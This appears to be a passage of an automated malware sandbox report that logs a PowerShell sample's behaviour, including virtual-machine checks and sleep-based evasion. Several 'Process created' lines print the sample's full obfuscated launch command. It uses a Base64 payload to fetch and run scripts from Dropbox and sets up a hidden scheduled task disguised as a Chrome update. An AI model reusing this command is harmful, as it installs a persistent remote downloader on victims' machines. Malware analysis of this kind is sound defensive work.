                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterConfiguration
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterConfiguration
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6075Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3696Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4554Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5264Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1432Thread sleep count: 6075 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4856Thread sleep count: 3696 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3428Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7208Thread sleep time: -14757395258967632s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7224Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3D9CEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3D9CEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                Source: powershell.exe, 00000002.00000002.1821493344.000002C3D9CEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                Source: powershell.exe, 00000002.00000002.1852867523.000002C3F2115000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1968184626.0000019FD32B2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Bypasses PowerShell execution policy
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /W 1 -ep bypass -w hidden -command $cmkGnaBV=[Convert]::FromBase64String('JHBwcCA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAiY2hyb21lLnBzMSI7ICRzdHIgPSAnJGFhYSA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAidGVtcC5wczEiOyB3Z2V0IC1VcmkgImh0dHBzOi8vZGwuZHJvcGJveHVzZXJjb250ZW50LmNvbS9zY2wvZmkvZGt1YW1scmxzcmJ5Z3NvMXN3bjhwL3NhbnRhMi1mLnR4dD9ybGtleT1yOGZlMHZpaWVyMW13djlhems1YXd5NXM5JnN0PXl2cXFmZGZ5JmRsPTAiIC1PdXRGaWxlICRhYWE7ICYgJGFhYTsgUmVtb3ZlLUl0ZW0gLVBhdGggJGFhYSAtRm9yY2U7JzsgJHN0ciB8IE91dC1GaWxlIC1GaWxlUGF0aCAkcHBwIC1FbmNvZGluZyBVVEY4OyAkYWN0aW9uID0gTmV3LVNjaGVkdWxlZFRhc2tBY3Rpb24gLUV4ZWN1dGUgJ1Bvd2VyU2hlbGwuZXhlJyAtQXJndW1lbnQgJy1XaW5kb3dTdHlsZSBIaWRkZW4gLW5vcCAgLU5vbkludGVyYWN0aXZlIC1Ob1Byb2ZpbGUgLUV4ZWN1dGlvblBvbGljeSBCeXBhc3MgLUNvbW1hbmQgIiYgeyRhYmMgPSBKb2luLVBhdGggKCRlbnY6QXBwRGF0YSkgXCJjaHJvbWUucHMxXCI7ICYgJGFiYzt9Iic7ICR0cmlnZ2VyID0gTmV3LVNjaGVkdWxlZFRhc2tUcmlnZ2VyIC1PbmNlIC1BdCAoR2V0LURhdGUpLkFkZE1pbnV0ZXMoNSkgLVJlcGV0aXRpb25JbnRlcnZhbCAoTmV3LVRpbWVTcGFuIC1NaW51dGVzIDMwKTsgJHNldHRpbmdzID0gTmV3LVNjaGVkdWxlZFRhc2tTZXR0aW5nc1NldCAtSGlkZGVuOyBSZWdpc3Rlci1TY2hlZHVsZWRUYXNrIC1UYXNrTmFtZSAiQ2hyb21lVXBkYXRlVGFza01hY2hpbmUiIC1BY3Rpb24gJGFjdGlvbiAtVHJpZ2dlciAkdHJpZ2dlciAtU2V0dGluZ3MgJHNldHRpbmdzOyAgJGFhYSA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAic3lzdGVtX2ZpcnN0LnBzMSI7IHdnZXQgLVVyaSAiaHR0cHM6Ly9kbC5kcm9wYm94dXNlcmNvbnRlbnQuY29tL3NjbC9maS9nN21jc2hreDNxbW81bXZ5dGYyY3Qvc2FudGEyLXgudHh0P3Jsa2V5PTVuYmJxZWdjNWE3N3I3NmhpeW02czl5Mmgmc3Q9NzI3Y3MxbXgmZGw9MCIgLU91dEZpbGUgJGFhYTsgJiAkYWFhOyBSZW1vdmUtSXRlbSAtUGF0aCAkYWFhIC1Gb3JjZTs=');$U9zBwFeD = [System.Text.Encoding]::UTF8.GetString($cmkGnaBV);&('{5}{0}{2}{1}{3}{4}{6}'-f 'oke','xp','-E','res','sio','Inv','n') $U9zBwFeD
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /W 1 -ep bypass -w hidden -command $cmkGnaBV=[Convert]::FromBase64String('JHBwcCA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAiY2hyb21lLnBzMSI7ICRzdHIgPSAnJGFhYSA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAidGVtcC5wczEiOyB3Z2V0IC1VcmkgImh0dHBzOi8vZGwuZHJvcGJveHVzZXJjb250ZW50LmNvbS9zY2wvZmkvZGt1YW1scmxzcmJ5Z3NvMXN3bjhwL3NhbnRhMi1mLnR4dD9ybGtleT1yOGZlMHZpaWVyMW13djlhems1YXd5NXM5JnN0PXl2cXFmZGZ5JmRsPTAiIC1PdXRGaWxlICRhYWE7ICYgJGFhYTsgUmVtb3ZlLUl0ZW0gLVBhdGggJGFhYSAtRm9yY2U7JzsgJHN0ciB8IE91dC1GaWxlIC1GaWxlUGF0aCAkcHBwIC1FbmNvZGluZyBVVEY4OyAkYWN0aW9uID0gTmV3LVNjaGVkdWxlZFRhc2tBY3Rpb24gLUV4ZWN1dGUgJ1Bvd2VyU2hlbGwuZXhlJyAtQXJndW1lbnQgJy1XaW5kb3dTdHlsZSBIaWRkZW4gLW5vcCAgLU5vbkludGVyYWN0aXZlIC1Ob1Byb2ZpbGUgLUV4ZWN1dGlvblBvbGljeSBCeXBhc3MgLUNvbW1hbmQgIiYgeyRhYmMgPSBKb2luLVBhdGggKCRlbnY6QXBwRGF0YSkgXCJjaHJvbWUucHMxXCI7ICYgJGFiYzt9Iic7ICR0cmlnZ2VyID0gTmV3LVNjaGVkdWxlZFRhc2tUcmlnZ2VyIC1PbmNlIC1BdCAoR2V0LURhdGUpLkFkZE1pbnV0ZXMoNSkgLVJlcGV0aXRpb25JbnRlcnZhbCAoTmV3LVRpbWVTcGFuIC1NaW51dGVzIDMwKTsgJHNldHRpbmdzID0gTmV3LVNjaGVkdWxlZFRhc2tTZXR0aW5nc1NldCAtSGlkZGVuOyBSZWdpc3Rlci1TY2hlZHVsZWRUYXNrIC1UYXNrTmFtZSAiQ2hyb21lVXBkYXRlVGFza01hY2hpbmUiIC1BY3Rpb24gJGFjdGlvbiAtVHJpZ2dlciAkdHJpZ2dlciAtU2V0dGluZ3MgJHNldHRpbmdzOyAgJGFhYSA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAic3lzdGVtX2ZpcnN0LnBzMSI7IHdnZXQgLVVyaSAiaHR0cHM6Ly9kbC5kcm9wYm94dXNlcmNvbnRlbnQuY29tL3NjbC9maS9nN21jc2hreDNxbW81bXZ5dGYyY3Qvc2FudGEyLXgudHh0P3Jsa2V5PTVuYmJxZWdjNWE3N3I3NmhpeW02czl5Mmgmc3Q9NzI3Y3MxbXgmZGw9MCIgLU91dEZpbGUgJGFhYTsgJiAkYWFhOyBSZW1vdmUtSXRlbSAtUGF0aCAkYWFhIC1Gb3JjZTs=');$U9zBwFeD = [System.Text.Encoding]::UTF8.GetString($cmkGnaBV);&('{5}{0}{2}{1}{3}{4}{6}'-f 'oke','xp','-E','res','sio','Inv','n') $U9zBwFeDJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /w 1 -ep bypass -w hidden -command $cmkgnabv=[convert]::frombase64string('jhbwcca9iepvaw4tugf0acaojgvudjpbchbeyxrhksaiy2hyb21llnbzmsi7icrzdhigpsanjgfhysa9iepvaw4tugf0acaojgvudjpbchbeyxrhksaidgvtcc5wczeioyb3z2v0ic1vcmkgimh0dhbzoi8vzgwuzhjvcgjvehvzzxjjb250zw50lmnvbs9zy2wvzmkvzgt1yw1scmxzcmj5z3nvmxn3bjhwl3nhbnrhmi1mlnr4dd9ybgtlet1yogzlmhzpawvymw13djlhems1yxd5nxm5jnn0pxl2cxfmzgz5jmrsptaiic1pdxrgawxlicrhywe7icygjgfhytsgumvtb3zllul0zw0glvbhdgggjgfhysatrm9yy2u7jzsgjhn0cib8ie91dc1gawxlic1gawxlugf0acakchbwic1fbmnvzgluzybvvey4oyakywn0aw9uid0gtmv3lvnjagvkdwxlzfrhc2tby3rpb24gluv4zwn1dgugj1bvd2vyu2hlbgwuzxhljyatqxjndw1lbnqgjy1xaw5kb3dtdhlszsbiawrkzw4glw5vccaglu5vbkludgvyywn0axzlic1ob1byb2zpbgugluv4zwn1dglvblbvbgljesbcexbhc3mglunvbw1hbmqgiiygeyrhymmgpsbkb2lulvbhdgggkcrlbny6qxbwrgf0yskgxcjjahjvbwuuchmxxci7icygjgfiyzt9iic7icr0cmlnz2vyid0gtmv3lvnjagvkdwxlzfrhc2tucmlnz2vyic1pbmnlic1bdcaor2v0lurhdguplkfkze1pbnv0zxmonskglvjlcgv0axrpb25jbnrlcnzhbcaotmv3lvrpbwvtcgfuic1naw51dgvzidmwktsgjhnldhrpbmdzid0gtmv3lvnjagvkdwxlzfrhc2ttzxr0aw5nc1nldcatsglkzgvuoybszwdpc3rlci1ty2hlzhvszwruyxnric1uyxnrtmftzsaiq2hyb21lvxbkyxrlvgfza01hy2hpbmuiic1by3rpb24gjgfjdglvbiatvhjpz2dlciakdhjpz2dlciatu2v0dgluz3mgjhnldhrpbmdzoyagjgfhysa9iepvaw4tugf0acaojgvudjpbchbeyxrhksaic3lzdgvtx2zpcnn0lnbzmsi7ihdnzxqglvvyasaiahr0chm6ly9kbc5kcm9wym94dxnlcmnvbnrlbnquy29tl3njbc9mas9nn21jc2hrednxbw81bxz5dgyyy3qvc2fudgeylxgudhh0p3jsa2v5ptvuymjxzwdjnwe3n3i3nmhpew02czl5mmgmc3q9nzi3y3mxbxgmzgw9mciglu91dezpbgugjgfhytsgjiakywfhoybszw1vdmutsxrlbsatugf0acakywfhic1gb3jjzts=');$u9zbwfed = [system.text.encoding]::utf8.getstring($cmkgnabv);&('{5}{0}{2}{1}{3}{4}{6}'-f 'oke','xp','-e','res','sio','inv','n') $u9zbwfed
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /w 1 -ep bypass -w hidden -command $cmkgnabv=[convert]::frombase64string('jhbwcca9iepvaw4tugf0acaojgvudjpbchbeyxrhksaiy2hyb21llnbzmsi7icrzdhigpsanjgfhysa9iepvaw4tugf0acaojgvudjpbchbeyxrhksaidgvtcc5wczeioyb3z2v0ic1vcmkgimh0dhbzoi8vzgwuzhjvcgjvehvzzxjjb250zw50lmnvbs9zy2wvzmkvzgt1yw1scmxzcmj5z3nvmxn3bjhwl3nhbnrhmi1mlnr4dd9ybgtlet1yogzlmhzpawvymw13djlhems1yxd5nxm5jnn0pxl2cxfmzgz5jmrsptaiic1pdxrgawxlicrhywe7icygjgfhytsgumvtb3zllul0zw0glvbhdgggjgfhysatrm9yy2u7jzsgjhn0cib8ie91dc1gawxlic1gawxlugf0acakchbwic1fbmnvzgluzybvvey4oyakywn0aw9uid0gtmv3lvnjagvkdwxlzfrhc2tby3rpb24gluv4zwn1dgugj1bvd2vyu2hlbgwuzxhljyatqxjndw1lbnqgjy1xaw5kb3dtdhlszsbiawrkzw4glw5vccaglu5vbkludgvyywn0axzlic1ob1byb2zpbgugluv4zwn1dglvblbvbgljesbcexbhc3mglunvbw1hbmqgiiygeyrhymmgpsbkb2lulvbhdgggkcrlbny6qxbwrgf0yskgxcjjahjvbwuuchmxxci7icygjgfiyzt9iic7icr0cmlnz2vyid0gtmv3lvnjagvkdwxlzfrhc2tucmlnz2vyic1pbmnlic1bdcaor2v0lurhdguplkfkze1pbnv0zxmonskglvjlcgv0axrpb25jbnrlcnzhbcaotmv3lvrpbwvtcgfuic1naw51dgvzidmwktsgjhnldhrpbmdzid0gtmv3lvnjagvkdwxlzfrhc2ttzxr0aw5nc1nldcatsglkzgvuoybszwdpc3rlci1ty2hlzhvszwruyxnric1uyxnrtmftzsaiq2hyb21lvxbkyxrlvgfza01hy2hpbmuiic1by3rpb24gjgfjdglvbiatvhjpz2dlciakdhjpz2dlciatu2v0dgluz3mgjhnldhrpbmdzoyagjgfhysa9iepvaw4tugf0acaojgvudjpbchbeyxrhksaic3lzdgvtx2zpcnn0lnbzmsi7ihdnzxqglvvyasaiahr0chm6ly9kbc5kcm9wym94dxnlcmnvbnrlbnquy29tl3njbc9mas9nn21jc2hrednxbw81bxz5dgyyy3qvc2fudgeylxgudhh0p3jsa2v5ptvuymjxzwdjnwe3n3i3nmhpew02czl5mmgmc3q9nzi3y3mxbxgmzgw9mciglu91dezpbgugjgfhytsgjiakywfhoybszw1vdmutsxrlbsatugf0acakywfhic1gb3jjzts=');$u9zbwfed = [system.text.encoding]::utf8.getstring($cmkgnabv);&('{5}{0}{2}{1}{3}{4}{6}'-f 'oke','xp','-e','res','sio','inv','n') $u9zbwfedJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
